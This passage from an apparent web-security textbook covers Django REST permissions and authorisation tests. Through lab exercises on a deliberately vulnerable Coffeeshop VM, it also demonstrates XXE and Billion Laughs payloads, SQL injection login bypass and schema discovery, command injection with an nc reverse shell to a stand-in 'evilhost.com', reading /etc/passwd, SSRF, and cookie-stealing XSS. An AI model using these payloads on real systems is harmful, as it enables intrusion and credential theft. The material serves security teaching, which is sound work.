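print(after_first_patch == after_second_patch)  # False: the state differs

# Repeating a PUT always leaves the record exactly as supplied
full = {"City": "Chicago", "State": "IL", "Postcode": "60600"}
after_first_put = put(address, full)
after_second_put = put(patch(after_first_put, {"State": "OR"}), full)
print(after_first_put == after_second_put)  # True
```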
DELETE Requests
DELETE removes an item, so it is called on items, not collections. It is
normally regarded as idempotent as deleting a record a number of times
makes the database look the same. However, deleting a nonexistent record
results in a 404 Not Found message, so arguably it is not idempotent at all.
DELETE is not cacheable as we might wish to call DELETE, then a POST to
create the item again, then another DELETE.
DELETE should return 200 OK if the response contains a body (e.g., a
status message or the ID of the deleted object). It should return 204 No
Content if the response does not contain a body and 404 Not Found if the
item does not exist.
A summary of REST methods is given in Table 6-1.
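from rest_framework import serializers

from .models import Address  # assumes Address is defined in models.py


class AddressSerializer(serializers.ModelSerializer):
    class Meta:
        model = Address
        fields = ['pk', 'address1', 'address2', 'city',
                  'postcode', 'country']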
We only include the fields we want to send between the client and
server. We do not include user as we take that from the logged-in user.
1 http://django-rest-framework.org
Listing 6-2. REST API view set for the Address model, in views.py
class AddressViewSet(viewsets.ModelViewSet):
    def get_queryset(self):
        return Address.objects.filter(user=self.request.user)
    serializer_class = AddressSerializer
    permission_classes = [permissions.IsAuthenticated,
                          OwnsAddress]
Lines 8–9 overwrite the default item creation function. We do this to set
the user attribute to the person who is logged in, because we are not taking
it from the serialized data stream.
We have two permissions classes defined (line 6). The permissions.
IsAuthenticated permission comes with the REST framework. We defined
the other ourselves, in permissions.py. It is shown in the next listing.
class OwnsAddress(BasePermission):
    def has_object_permission(self, request, view, obj):
        return obj.user == request.user

router = routers.DefaultRouter()
router.register(r'addresses', views.AddressViewSet,
                basename="addresses")
urlpatterns = [
    ...
    path('api/', include(router.urls)),
    path('api-auth/', include('rest_framework.urls',
                              namespace='rest_framework')),
]
For now, log in as user bob using option 1. The password is in the
coffeeshop/secrets/config.env file. Look for DBUSER1PWD.
Create a new address by filling out the form below the address book and
clicking on POST.
http://10.50.0.2/api/addresses/pk
taking pk from the address you want to view from the list. For example, you
can view the first (and only) address in bob’s address book by visiting
http://10.50.0.2/api/addresses/1
You can update the address by entering data in the form below it and clicking
the PUT button (thereby issuing a PUT request). You can delete the address by
clicking the DELETE button (a DELETE request).
@login_required
def basket(request):
    cart = None
    ...
If a user is logged in, Django executes the function. If not, the user is
redirected to the login page and sent back upon successful login. Django
also has a @permission_required decorator that returns an error if the
logged-in user doesn’t have the stated permission.
Using decorators (or permission_classes in REST view classes)
adds clarity to your code, making it easier to spot incorrect authorization
settings.
One common mistake is to not apply permission checks on URLs
called internally. For example, imagine a user has entered form data. The
Submit button sends them to the URL /submitform. Once the form has
been processed, the user is redirected to a URL /viewdata that displays the
data they submitted. The /viewdata function needs the same permission
checks as /submitform; otherwise, a malicious user could visit it directly.
In case errors do slip through, we can unit test permissions. Good
developers unit test the functionality of their code but can forget to test
that the code is callable by valid users and not callable by invalid ones.
Imagine a site that has a URL /protected/. This URL should only be
available to logged-in users. As well as testing that the code that serves
/protected/ actually performs the correct processing, we should also check
that it can be called when a user is logged in and cannot be called when
there is no logged-in user. We can put the following in the tests.py file:
from django.contrib.auth.models import AnonymousUser, User
from django.test import RequestFactory, TestCase
from django.urls import resolve

class SimpleTest(TestCase):
    def setUp(self):
        self.factory = RequestFactory()
        self.testuser = User.objects.create_user(
            username='testuser',
            email='[email protected]',
            password='testpass123')

    def test_authorized(self):
        url = '/protected/'
        request = self.factory.get(url)
        request.user = self.testuser
        myview, myargs, mykwargs = resolve(url)
        response = myview(request)
        self.assertEqual(response.status_code, 200)
    def test_unauthorized(self):
        url = '/protected/'
        request = self.factory.get(url)
        request.user = AnonymousUser()
        myview, myargs, mykwargs = resolve(url)
        response = myview(request)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response['location'], '/account/login/?next=/protected/')
When the tests are run, Django creates a fresh, empty database, with the
schema but nothing else. Django runs each class extending TestCase and,
within those, every function beginning with test_. The setUp() function is called before each
test. We use this to create a test user.
The test_authorized() function first creates a request object for the
URL we are testing, at line 15. We set the user to our test user as we want
to confirm that the page is accessible when a user is logged in. We next
resolve the URL into the function that handles it (line 17) so that we can
call it (line 18). If all went well, Django should return the HTML for the
basket page and a response code of 200 OK. We are not checking the HTML
of the response in this case, only that the response code is 200. We do this
with an assert at line 19.
The test_unauthorized() function tests that the view is inaccessible
when a user is not logged in. We put the request’s user in the
unauthenticated state by setting it to AnonymousUser() at line 23.
Line 26 tests that the response code is 302 Found. We do not test that it
equals 403 Forbidden. The reason is the @login_required decorator we
use in Django redirects the user to the login page, rather than returning
403 Forbidden. If testing a REST API call, you assert the response code is
403, not 302, as it does not perform a redirect.
At line 27, we also check the redirect location does in fact go to the
login page.
One final point to note before we try this in an exercise is how Django
creates the test database. It uses the same database engine configured in
the DATABASES variable in settings.py. It creates a new database with
the same name but prefixed with test_. This means the database user
Django is configured with has to have database creation permissions.
This is undesirable in production settings, so we would need to create a separate
configuration for development. An alternative is to change the database
engine to SQLite just for tests. We do this with the following lines in
settings.py
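One common way to do this is sketched below; it is an assumption about the approach, not necessarily the exact lines used in the Coffeeshop project. The select_databases() helper, the SQLite file name, and the Postgres database name are hypothetical. The check relies on the tests being started with python manage.py test, which puts the word test in sys.argv.

```python
import sys


def select_databases(argv, default_databases):
    """Return the DATABASES setting, swapping in SQLite when running tests."""
    if "test" in argv:
        return {
            "default": {
                "ENGINE": "django.db.backends.sqlite3",
                "NAME": "test_db.sqlite3",  # hypothetical file name
            }
        }
    return default_databases


# Hypothetical production-style configuration
POSTGRES = {
    "default": {
        "ENGINE": "django.db.backends.postgresql",
        "NAME": "coffeeshop",
    }
}

# In settings.py, the result would be assigned to DATABASES
DATABASES = select_databases(sys.argv, POSTGRES)
```

With this in place, the production database user no longer needs permission to create databases, because the test database is just a local file.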
In this exercise, we will create a test case for the /basket/ URL like the one
in Listing 6-5. If you like, you can try writing it yourself based on this listing. As
in that case, you will want to test that the response code in the second test is 302
and that the location has an appropriate value.
/vagrant/snippets/unittests
6.4 Deserialization Attacks
In Section 6.2, we used JSON for our request and response bodies. JSON
has become a popular serialization format for a number of reasons:
1. It is easy for humans to read and edit with standard
editors.
3. It is fairly compact.
XML Attacks
XML is a flexible data format that contains features that developers are
sometimes unaware of and that can be exploited.
A famous XML vulnerability is known as the Billion Laughs attack.
The name comes from its original example. XML supports a directive
called <!ENTITY>. It allows the author of the XML to define a shortcut. For
example, the author could define
<!ENTITY ms "Microsoft Corp">
Then, instead of writing Microsoft Corp in the XML body, the author
just has to write &ms;.
Unfortunately, entities can be nested: an entity can refer
to another entity. This feature is exploited by the Billion Laughs attack.
Consider the following XML document.
<?xml version="1.0"?>
<!DOCTYPE hahas [
<!ENTITY haha "haha">
<!ENTITY haha2 "&haha;&haha;&haha;&haha;&haha;&haha;&haha;&haha;&haha;&haha;">
<!ENTITY haha3 "&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;">
...
]>
<hahas>&haha9;</hahas>
Line 3 defines a macro &haha; that just expands to the text haha. Line 4
defines a macro &haha2; that expands to ten &haha;’s, in other words, ten
haha’s. Line 5 expands to 10 &haha2;’s, in other words 100 haha’s, and so
on, up to &haha9;.
As a result, placing a single &haha9; in the last line of the document
results in the insertion of one billion haha’s. A file that has taken no
more than 1K of text for the attacker has consumed 3GB of memory on
the server.
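The growth can be checked safely on a small scale. The sketch below does not use an XML parser; the expand() and build_entities() helpers are hypothetical and simply mimic entity substitution with string replacement, using only four levels so that the result stays small.

```python
import re


def expand(entities, text):
    """Repeatedly replace &name; references until none remain."""
    pattern = re.compile(r"&(\w+);")
    while pattern.search(text):
        text = pattern.sub(lambda m: entities[m.group(1)], text)
    return text


def build_entities(levels, fanout=10):
    """Define haha, haha2, ..., each made of `fanout` copies of the previous one."""
    entities = {"haha": "haha"}
    previous = "haha"
    for level in range(2, levels + 1):
        name = f"haha{level}"
        entities[name] = f"&{previous};" * fanout
        previous = name
    return entities


entities = build_entities(levels=4)
expanded = expand(entities, "&haha4;")
print(len(expanded))  # 4000 characters: 1,000 copies of "haha"
```

Each extra level adds one short line to the document but multiplies the expanded size by ten, which is why the attacker's file stays tiny while the server's memory use does not.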
Of course, no developer would write such code in their own
application. However, if server-side code to parse XML exists and entity
expansion is allowed, as is the case in many XML parsers, then an attacker
can craft a request that results in a Denial of Service.
The entity tag also supports a parameter called SYSTEM. This expands to
the contents of a URL. It can be exploited by the XML External Entity (XXE)
attack, resulting in file disclosure if the expanded XML is visible to the attacker.
Listing 6-7 displays the Unix password file.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
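Both attacks depend on the document carrying its own DOCTYPE declaration. One possible defense, sketched here with Python's built-in expat bindings, is to refuse any document that contains one. The parse_without_dtd() function and the DTDForbidden exception are hypothetical names, and this is an illustration of the idea rather than a complete hardened parser.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_without_dtd(xml_text):
    """Collect element text while refusing any document with a DOCTYPE."""
    texts = []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat as soon as it sees <!DOCTYPE ...>
        raise DTDForbidden("DOCTYPE declarations are not accepted")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.CharacterDataHandler = texts.append
    parser.Parse(xml_text, True)
    return "".join(texts)


print(parse_without_dtd("<product>1</product>"))  # 1
```

Because the handler raises before any entity is defined, neither entity expansion nor the SYSTEM lookup takes place.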
function getStockLevel() {
    const productId = "{{ product.id }}";
    fetch("{% url 'stocklevel' %}", {
        method: 'POST',
        headers: {
            'Content-Type': 'application/xml'
        },
        body: "<product>" + productId + "</product>"
    })
    .then(
        function(response) {
            if (response.status == 200) {
                response.json().then(function(data) {
                    if (data.quantity == 0)
                        $('#stocklevel').html('<p class="text-danger">Out of Stock</p>');
                    else
                        $('#stocklevel').html('<p class="text-success">' + data.quantity
                            + ' in stock</p>');
                }
                );
            }
        }
    )
}
Start an SSH session in each of our two VMs with vagrant ssh. In the
Coffeeshop VM, run the command
top
The API endpoint /stocklevel/ takes the product ID in the XML body. You
should see a JSON return string of
{"quantity": 10}
cd /vagrant/snippets
cat hundred_million_laughs.xml | \
    curl -X POST --data-binary @- http://10.50.0.2/stocklevel/
Now switch back to your Coffeeshop VM and take a look at top. At the
beginning of the list, you will see a Python process now taking close to 40% of
the memory in the VirtualBox version (the percentage is smaller in the Docker
version, but only because more memory is allocated to the container).
The API call will fail with a 500 Server Error response code, but that is
not the object of the attack. Even after the call ends, the Python process is
still consuming over a third of the memory. Adding the extra haha line would
increase this by a factor of ten.
6.5 Summary
In this chapter, we looked at how to safely design our application's
endpoints: when to use POST vs. GET and how to build a safe REST API. We
saw how adhering to the established REST standards and using existing
frameworks can make your code safer. We also looked at some common
deserialization vulnerabilities that enable an attacker to exploit poor
communication formats between a client and server, in particular unsafe
use of XML.
We focussed on URLs. In the next chapter, we will look at
vulnerabilities that can be introduced when our application accepts input
from a user, in any of its forms. We will look at techniques to remove these
vulnerabilities.
CHAPTER 7
Cookies and
User Input
In this chapter, we will look at one of the most common sources of
vulnerabilities in a web application: user input. It can pose a threat
when that input is either displayed in web pages, stored on the server, or
executed.
We will begin by looking in some detail at how cookies are set by a web
server and how they are used by the browser. Incorrect cookie settings are
a frequent source of vulnerabilities. We will then examine some common
user input-oriented vulnerabilities and how to fix them: injection, server-
side request forgery, and cross-site scripting.
into performing some action, usually using tools already on their device
such as their web browser. Poor handling of user input can lead to both
types of attack.
User input includes
• Cookies
While not exactly user input, JavaScript, even when sent from your own
site, can pose the same threats.
We looked at JSON and XML data in the last chapter. We will look at the
remainder in the sections that follow.
7.2 Cookies
Cookies are key/value pairs sent from the server to the client in a response
header. The client, for example, a web browser, stores them in a file and
sends them to the server in a request header if certain conditions are met.
Chrome and Firefox both store cookies in a SQLite database. SQLite
databases are themselves a single file. Cookies are set by the server with
the Set-Cookie header:
Set-Cookie: cookie-name=cookie-settings
where
An example is
Set-Cookie: lang=en
On subsequent visits to the same site, the browser would send the
following back to the server in the request headers:
Cookie: lang=en
Attribute         Description
Expires=datetime  Do not send the cookie after the given time. The value should be given as day, month year hour:min:sec TZ.
Max-Age=secs      Do not send the cookie after the given number of seconds have elapsed.
Domain=domain     Only send the cookie for given domains.
Path=path         Only send the cookie for URLs under the named path (including subpaths).
Secure            Only send the cookie over HTTPS.
HttpOnly          Do not allow the cookie to be read by JavaScript code.
SameSite=value    Controls how the cookie is sent in cross-site requests. Described in the following text.
If the browser had multiple cookies for the same site, they would be
concatenated with semicolons, for example:
Domain and Path
By default, the cookie is sent for all URLs on the host it was sent from (based on
the host in the URL) and to no other hosts, not even subdomains.
If the Domain attribute is set, the cookie is sent to that domain and
its subdomains. For example, if Domain is set to example.com, it is sent to
example.com, www.example.com, etc. If it is set to www.example.com, it is
sent only to that host and its own subdomains.
If Path is set, it is only sent for URIs under that path. For example, if
Path is /api, the cookie is sent for /api, /api/call1, etc. If it is set to /, the
cookie is sent to all URIs.
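As an illustration of the attributes in the table above, Python's standard http.cookies module can build a Set-Cookie header and parse a Cookie header. The attribute values and the second cookie, theme, are made up for the example; in a Django application the framework normally sets these headers for us.

```python
from http.cookies import SimpleCookie

# Build a Set-Cookie header with several attributes
cookie = SimpleCookie()
cookie["lang"] = "en"
cookie["lang"]["domain"] = "example.com"
cookie["lang"]["path"] = "/api"
cookie["lang"]["max-age"] = 3600
cookie["lang"]["secure"] = True
cookie["lang"]["httponly"] = True
cookie["lang"]["samesite"] = "Lax"

header = cookie.output()
print(header)

# Parse the Cookie request header a browser might send back
received = SimpleCookie()
received.load("lang=en; theme=dark")  # "theme" is a made-up second cookie
print(received["lang"].value, received["theme"].value)
```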
<script>
alert(document.cookie)
</script>
will not display the cookie if HttpOnly was set. We will return to this later in
the chapter when we talk about cross-site scripting.
Session ID Cookies
Session ID cookies are a common way for websites to keep a user logged
in between requests. As HTTP is stateless, the only way to associate a user
with a request is to store something on both the client and server that can
be matched against each other.
Let us look at the situations where the cookie will be sent by the
browser:
In all cases, the site will receive the session ID, and the user will be
considered logged in without having to enter a username and password.
Now consider what happens if SameSite is set to Lax. The cookie will
only be sent
In all these cases, the user will be considered logged in. If the user
visits by following a link on another site, the user will not be logged in and
will be prompted for a username and password.
Finally, if SameSite is set to Strict, the cookie will only be sent if the
user follows a link from a coffeeshop.com page to another page on the
same domain. In all other cases, the user will have to log in again.
Setting the SameSite value inappropriately can lead to certain attacks
such as cross-site request forgery. We will investigate these in Chapter 8.
7.3 Injection Attacks
Injection refers to vulnerabilities where a user can submit input that is
executed in some way on the server. If an input field is not validated, an
attacker can insert malicious code or data. Usually, the user-entered code
is concatenated with code on the server, rather than being a complete
command in itself.
The most well-known injection vulnerability is SQL injection. The most
common source is form fields (e.g., username/password fields, search
fields), but the vulnerability can exist anywhere data is captured
from the client and executed on the server in a SQL query. Other places
can include GET parameters or REST API calls.
Other types of injection include command injection, where OS
commands are executed (e.g., Bash commands executed through Python’s
os.system() function), and code injection (e.g., executing Python code
through its eval() function). Cross-site scripting, which is effectively
injecting HTML and JavaScript code, is discussed later in this chapter.
7.4 SQL Injection
Imagine a web page that asks for a user to log in by entering a username
and password into an HTML form:
The handler for the /login URL has the following code for checking if
the credentials are correct:
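# hashlib.md5() needs bytes, so the password string is encoded first
password_hash = hashlib.md5(password.encode()).hexdigest()
# Vulnerable: user input is concatenated directly into the SQL string
sql = "select user_id from User where username = '" + username \
    + "' and password = '" + password_hash + "'"
with connection.cursor() as cursor:
    cursor.execute(sql)
    row = cursor.fetchone()
    ...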
Here, username and password are taken from the two form input fields.
If the user enters a username and password that match an entry in the
User table, a row will be returned by the SQL query, and the user will be
logged in.
Let’s say an attacker enters the following in the username field and
some random text (say, xxx) in the password field:
bob'--
When the server code is executed, the sql variable will contain the
following (bold indicates the text that the user entered):
So long as the user bob exists, a row will be returned regardless what
the password is. The attacker will be logged in.
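The bypass can be reproduced safely with an in-memory database. This sketch uses Python's built-in sqlite3 module as a stand-in for Postgres; the table layout, bob's real password, and the vulnerable_login() helper are assumptions made for the demonstration.

```python
import hashlib
import sqlite3


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


connection = sqlite3.connect(":memory:")
connection.execute(
    "create table User (user_id integer primary key, username text, password text)")
connection.execute(
    "insert into User (username, password) values (?, ?)",
    ("bob", md5_hex("correct horse")))


def vulnerable_login(username, password):
    """Builds the query by concatenation, as in the vulnerable handler."""
    sql = "select user_id from User where username = '" + username \
        + "' and password = '" + md5_hex(password) + "'"
    return sql, connection.execute(sql).fetchone()


sql, row = vulnerable_login("bob'--", "xxx")
print(sql)  # everything after -- is treated as a comment
print(row)  # (1,) even though the password is wrong
```

Calling vulnerable_login("bob", "xxx") without the injected quote and comment returns no row, as intended.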
If the attacker did not know a valid username, they could enter the
following for the username:
Ignoring the part after the comment, the SQL engine will execute
The semicolon ends a SQL statement and begins a new one. Not only
would the attacker be logged in as the first user returned by the query,
but they would also be able to create their own user. Similarly, the
attacker could delete or alter rows.
Schema Discovery
Each of the preceding examples required that the attacker know the
column names in the user table, though username and password would
have been obvious guesses. The last example required the attacker to
know that the user table is called User. In Django, this is not the case; it is
auth_user. The attacker could of course try many different names (auth_
user is also a sensible guess, as many applications are built with Django).
However, an attacker could also query the schema to find out what the
table is called.
Imagine a search form that looks something like the following:
Now imagine the attacker enters the following in the search field:
The union keyword joins two select queries together. The only
requirement is that the number and types of the selected columns match.
In the server code, two varchar columns, name and description, are
selected. The attacker ensures they select two columns of type varchar.
The pg_catalog.pg_tables table in Postgres contains the names of all
the tables in the database. Conveniently for the attacker, it has two useful
varchar columns: schemaname and tablename.
Most likely, no results will be returned by the actual search string xxx.
However, the other select statement will return all the schema and table
names in the database as part of the search results.
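The same technique can be tried against an in-memory SQLite database. This is only an analogy: SQLite keeps its table list in sqlite_master rather than pg_catalog.pg_tables, and the product table, the search query, and the vulnerable_search() helper are hypothetical.

```python
import sqlite3

connection = sqlite3.connect(":memory:")
connection.executescript("""
    create table product (name text, description text);
    create table auth_user (username text, password text);
    insert into product values ('Dark Roast', 'A strong, dark coffee');
""")


def vulnerable_search(term):
    """Concatenates the search term into the query (do not do this)."""
    sql = "select name, description from product where name like '%" \
        + term + "%'"
    return connection.execute(sql).fetchall()


# A normal search returns matching products
print(vulnerable_search("Dark"))

# The injected union returns the table names as if they were products
print(vulnerable_search("xxx' union select type, name from sqlite_master--"))
```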
Now the attacker does not have to know what the user table is called.
They can get Postgres to tell them. They do have to know that Postgres is
the database engine. They could just try the correct syntax for all popular
databases—there are not that many. Alternatively, they could run nmap.
Recall from Chapter 5 that nmap revealed that Postgres was running.
The attacker would still have to know that the search query selected
two columns and that they were both varchars. The format of the search results
might give them a hint. If not, they could use trial and error. Databases do not
have that many data types, and they could try them exhaustively:
• int
• float
• varchar
• int, int
• int, float
• int, varchar
and so on. If the query included a float, say, they would be unable to find
a matching column in pg_catalog.pg_tables. However, they could select
a hard-coded value:
Once they find a query that works, they can run a few more: one to get
the schema names, another to get the column names, and so on. This is
another reason why detailed error messages should not be displayed for
users—it can reveal the schema to attackers. Hiding errors may not prevent
a determined attack, but the attacker will need more queries, which may
be noticed when monitoring logs or traffic.
Of course our attacker would probably not enter all these queries
manually. They would script them, or use an existing tool. One open
source tool is sqlmap.1
%00'
may well prevent the quote deletion from succeeding. Hackers also replace
a single quote with its URL-encoded form, %27, to avoid detection.
1 https://sqlmap.org
A far safer defense is to not use string concatenation at all. Instead, use
prepared statements.
Prepared statements are a feature of SQL engine APIs. Placeholders
are inserted into the SQL query where user-provided data is expected.
The statement is compiled, and the user input is passed as a parameter to
the execution function along with the compiled SQL statement. They also
improve performance, especially if the query is reused, as it only needs to
be compiled once.
The syntax varies between SQL libraries. Our VMs use psycopg2. An
example prepared statement is as follows:
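A minimal sketch of the idea, using Python's built-in sqlite3 module rather than psycopg2 so that it runs without a database server. Note that sqlite3 writes placeholders as ?, whereas psycopg2 writes them as %s; the table, the stored hash, and the find_user() helper are assumptions for the example.

```python
import sqlite3

connection = sqlite3.connect(":memory:")
connection.execute(
    "create table User (user_id integer primary key, username text, password text)")
connection.execute(
    "insert into User (username, password) values (?, ?)",
    ("bob", "hash-of-bobs-password"))


def find_user(username, password_hash):
    """Looks up a user with placeholders instead of string concatenation."""
    sql = "select user_id from User where username = ? and password = ?"
    # The values are passed separately and are never parsed as SQL
    return connection.execute(sql, (username, password_hash)).fetchone()


print(find_user("bob", "hash-of-bobs-password"))  # (1,)
print(find_user("bob'--", "anything"))            # None
```

The injected quote and comment are now compared literally against the username column, so they match nothing.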
The psycopg2 package makes it a bit harder for us when we want to use
a like clause, for example:
SQL INJECTION
/vagrant/snippets/injection.txt
The Coffeeshop application has a SQL vulnerability in the search function. Visit
the Coffeeshop URL at
http://10.50.0.2
and enter a search term (e.g., dark). Now take a look at the code (search()
in views.py). The vulnerability exists because of this line:
We will exploit the vulnerability by using the search term to display all
usernames and hashed passwords from the auth_user table (columns
username and password).
The query will be a bit more complex than the previous examples because we
have an open parenthesis, which must be closed to make the SQL valid. Enter
the following query into the search box:
Our union has to have matching data types for the selects on either side.
As the code selects an integer, two strings, and a float, we have to select the
same after the union. As the auth_user table has no float columns, we
select a constant value.
Press Enter to run the query. You should now be able to visit the admin
page http://10.50.0.2/admin and log in as bob (his username is in
coffeeshop.com/secrets/config.env).
To fix the vulnerability, we just turn the SQL statement into a prepared
statement. Edit
vagrant/coffeeshopsite/coffeeshop/views.py
to pick up the code changes. If you have errors, they will be in /var/log/
apache2/error.log.
After fixing the vulnerability, confirm that a legitimate search still works and
that SQL injection does not.
7.5 Command Injection
Command injection vulnerabilities are similar to SQL injection. The
difference is that user-supplied text is concatenated with a shell command
that is executed on the server, rather than SQL code that is executed by the
database.
Imagine an application that scales an image by a percentage supplied
by the user:
By now, you probably recognize why a vulnerability exists. If, for the
scale term, an attacker entered
then the server would execute the scale command as expected but would
then print out the contents of the system password file. The double
ampersand is Bash's AND operator and is an effective way of joining two commands
into a single command. The hash is the comment character. If the output
were captured and displayed in the response, the attacker would be able to
view the system users.
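One way to avoid this class of bug, sketched under assumptions: validate the value as a number and pass the command as a list of arguments so that no shell ever parses it. The use of ImageMagick's convert command, the output file name, the allowed range, and the function names are all hypothetical, and file name validation is left out.

```python
import subprocess


def build_scale_command(filename, scale):
    """Return an argument list for a hypothetical image-scaling command."""
    percent = int(scale)  # raises ValueError for anything but a whole number
    if not 1 <= percent <= 400:
        raise ValueError("scale out of range")
    # Each list element is passed as one argument; no shell parses it
    return ["convert", filename, "-resize", f"{percent}%", "scaled-" + filename]


def scale_image(filename, scale):
    # Without shell=True, "&&" and "#" have no special meaning
    return subprocess.run(build_scale_command(filename, scale), check=True)


print(build_scale_command("photo.png", "50"))

try:
    build_scale_command("photo.png", "50% photo.png && cat /etc/passwd #")
except ValueError:
    print("rejected")
```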
In this example, the output is not captured. It is, however, still a useful
vulnerability for an attacker. Consider the following value for the scale term:
nc -l evilhost.com 9000
Back Doors
A reverse shell is an example of a back door: an entry point an attacker
uses that was not intended by the developer. In our example, the developer
expects connections over HTTP and HTTPS on ports 80 and 443, but the
attacker has created a Bash entry point on port 9000.
A Bash shell using nc is useful for an attacker and dangerous for the
application. However, it is still rather limiting: the attacker must be present
to interactively operate the shell, it only accepts one connection at a time,
and file upload and download are difficult to enact.
Fortunately for attackers, other back doors exist. It is not hard to see
how nc could be replaced by a more sophisticated application that spawns
a new thread for each connection and that automates commands rather
than requiring them to be entered interactively.
Also fortunately for attackers, tools already exist with more features.
Metasploit2 is a popular framework with many exploits built in and is
also extensible. Metasploit contains exploits and payloads. Exploits
are modules that take advantage of a vulnerability. One example is
Metasploit’s web_delivery exploit, which takes advantage of a vulnerable
web form.
Once the exploit has been executed, Metasploit delivers a payload.
The user can select from a number of payloads supported by each exploit. A
Bash reverse shell over TCP (such as the one we showed in our example)
is one option, but Metasploit makes an additional 20 available for the web_
delivery exploit.
Metasploit also has staged payloads. These are delivered in parts.
Once the exploit is executed, Metasploit delivers a small payload whose
purpose is to download a larger one with more features. The python/
meterpreter/reverse_tcp payload in Metasploit has, for example, file
upload and download commands.
2 https://metasploit.com
COMMAND INJECTION
http://10.50.0.2
and click Contact in the menu bar at the top. You will have to log in if you have
not done so already.
http://10.50.0.2:1080
vagrant ssh
nc -l 9000
We will initiate a reverse shell in the same way as the example shown
previously, using the vulnerable contact form. Enter the following in the
message body:
Take a look at the code in the contact() function in views.py to see how
this works. Execute the code by sending the email.
whoami
ls
ps x
cat /etc/passwd
End the shell session with Ctrl-C. Note that, because the Bash session is
interactive, the web page will not finish loading until you quit the reverse shell.
For clarity, we have split the command onto several lines. In a real
attack, it would be entered without the carriage returns.
The COPY … FROM PROGRAM … command is Postgres’ syntax for running
a shell command. The output is copied into a table. Of course, we need a
table to copy it into, so we create the table first.
For our reverse shell, we are not interested in the output, so we don’t
care if we can read the table or not (though we can with further SQL
injection commands). We just want the command to be run so that it
connects to our nc server.
Clearly, allowing the web application’s database user to run shell
commands is dangerous, and this feature should be disabled in all but very
specialist applications.
{"url": "https://shop1.com/product/1"}
{"url": "https://localhost:9000/admin"}
Since the embedded call is made from within the intranet, port 9000
on localhost is not blocked. If the administrators assumed that only
authorized users have access to this port and therefore do not protect
it with a username and password, the attacker can gain access without
needing to authenticate.
This may sound like a rather obvious vulnerability, yet it exists in the
real world. One existed in GitLab until June 2021 when it was patched.3
An embedded URL similar to the preceding situation was made available
to integrate GitHub projects with GitLab. The vulnerability arose because
attackers, even unauthenticated ones, could use the API call to make
calls to other hosts internal to the network where the GitLab instance was
running.
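One way to reduce the risk of an embedded URL reaching internal hosts is
to check it against an allowlist before the server fetches it. The
following is a minimal sketch under stated assumptions, not the fix GitLab
applied: the function name is_safe_embedded_url and the ALLOWED_HOSTS set
are hypothetical, and the check rejects literal IP addresses and any host
not explicitly listed.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the embedded-URL feature may fetch from.
ALLOWED_HOSTS = {"shop1.com", "shop2.com"}


def is_safe_embedded_url(url: str) -> bool:
    """Return True only for https URLs whose host is on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = parts.hostname
    if host is None:
        return False
    # Reject literal IP addresses outright (127.0.0.1, 10.x.x.x, ::1, ...).
    try:
        ipaddress.ip_address(host)
        return False
    except ValueError:
        pass  # not an IP literal, so fall through to the name check
    return host.lower() in ALLOWED_HOSTS


print(is_safe_embedded_url("https://shop1.com/product/1"))
print(is_safe_embedded_url("https://localhost:9000/admin"))
```

An allowlist is used here rather than a blocklist because it fails closed:
a host the developer did not anticipate is refused by default.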
3 https://hackerone.com/bugs?report_id=301924&subject=gitlab
(login needed)
Reflected XSS
Before looking more closely at the impact XSS can have, let us look at
some examples. Recall the example in Section 7.4 where we considered a
vulnerable search form field. Imagine the results page contains the search
term as well as the matches, for example:
<script>
some malicious JavaScript code
</script>
Then, when the search results are displayed, the page will contain the
JavaScript, enclosed in legal HTML <script> … </script> tags, and would
therefore be executed.
This is an example of Reflected XSS. The JavaScript is not stored on the
server but is sent to the browser in the response and executed there.
The code is only executed in the attacker’s browser. Other users do
not receive the code. This may still have a harmful impact if the developer
assumed certain JavaScript code would or would not be executed, for
example, code that performs client-side form validation.
However, if this is the goal of the attacker, there is an easier way to have
JavaScript code executed in their browser: by editing the HTTP response
before it reaches the browser. We will do this in the next exercise.
If you followed the setup instructions in Chapter 2, you should have HTTP
Toolkit installed. We will use this to intercept and alter requests from our
Coffeeshop application.
Start HTTP Toolkit. Click on the button labelled Chrome Intercept a fresh
independent Chrome window. This will open a new Chrome instance. Return
to HTTP Toolkit and click on the Mock icon in the menu bar on the left. We can
use this tab to add rules when websites are visited.
Click on the + Add a new rule to rewrite requests or responses button. In the
Match drop-down, select Any requests, and in the Then drop-down, select
Pause the response to manually edit it.
Under Any requests, you will see another drop-down titled Add another
matcher and a Plus button. Click the drop-down and select For a URL. Enter
our Coffeeshop application root URL underneath, http://10.50.0.2/. Your
window should look like Figure 7-1. Now click on the Plus button to save the
matcher and then the Save button to save the rule.
You can now return to the Chrome window HTTP Toolkit opened and visit
our website, http://10.50.0.2/. HTTP Toolkit will pause before the
response is displayed. Return to the HTTP Toolkit. On the left you will see a
list of requests Chrome has made. On the right you will see the response it
is currently loading. Scroll down to the bottom of the response, down to just
above the </body> tag, and enter some JavaScript:
<script>
alert(document.cookie);
</script>
Your window should look like Figure 7-2. Now click on the Resume button.
Chrome will finish loading the page and execute your JavaScript, displaying
your session ID and CSRF token cookies.
You can now close HTTP Toolkit. It will also close the Chrome window.
Hackers are less interested in their own cookies than in other people’s
and so are more likely to try to get JavaScript code executed by a victim’s
browser, not their own.
One way would be to send a victim a link to a page with a reflected
XSS vulnerability, crafting the link to contain malicious JavaScript. The
Coffeeshop application has a vulnerable page to display a product,
using the URL
http://10.50.0.2/prod/?id=productid
http://10.50.0.2/prod/?id=1
http://10.50.0.2/prod/?id=%3Cscript%3Ealert%28%22Hacked%22%29%3C%2Fscript%3E
<script>alert("Hacked")</script>
to be pasted into the page and executed. If this is emailed to a victim, it will
be executed in their browser. You can try this on your Coffeeshop instance
and verify that it works.
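The percent-encoded link can be reproduced with Python's standard
library. This short sketch only illustrates the encoding step; the
variable names are our own, and the URL is the Coffeeshop product page
used in the text.

```python
from urllib.parse import quote, unquote

# The script the attacker wants the victim's browser to run.
payload = '<script>alert("Hacked")</script>'

# Percent-encode every reserved character so the payload survives in a URL.
encoded = quote(payload, safe="")
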